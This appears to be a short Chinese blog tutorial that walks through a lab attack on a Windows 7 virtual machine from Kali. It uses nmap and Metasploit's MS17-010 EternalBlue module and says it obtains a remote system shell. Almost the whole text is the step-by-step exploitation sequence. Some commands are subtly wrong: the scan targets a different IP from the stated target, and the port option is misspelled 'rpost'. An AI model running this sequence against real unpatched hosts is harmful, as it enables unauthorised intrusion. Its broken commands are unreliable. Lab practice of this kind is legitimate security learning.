作者:Xdong
滲透之路,路漫漫其修遠兮。
實驗環境:
兩台虛擬機:
攻擊機kali:192.168.31.182
靶機windows7 : 192.168.31.235
工具:metasploit、nmap
注:兩台虛擬機需要在同一局域網下。為了能順利完成本實驗,首先要保證兩台機子能相互ping通。建議兩台虛擬機網絡適配器都設成橋接模式。
第一步:掃描目標機器
nmap -sV -p 0-65535 192.168.31.65
可以看到靶機的445端口處於開啟狀態。
注:靶機掃描既可以在kali命令窗口掃描,也可以在啟動metasploit控制台后,在metasploit控制掃描。
第二步:啟動Metasploit控制台
msfconsole
第三步:使用ms17_010漏洞
use exploit/windows/smb/ms17_010_eternalblue
第四步:查看漏洞配置
show options
第五步:設置攻擊目標的ip和端口
set rhost 192.168.31.235
set rpost 445
第六步:滲透攻擊
run
到此,滲透成功,成功的從遠程系統上拿到Windows命令行的Shell。可以在shell界面輸入systeminfo測試。
目標回顯的信息呈現中文亂碼,kali終端字體默認是UTF-8,將其改為gb2312就行了。
------------恢復內容結束------------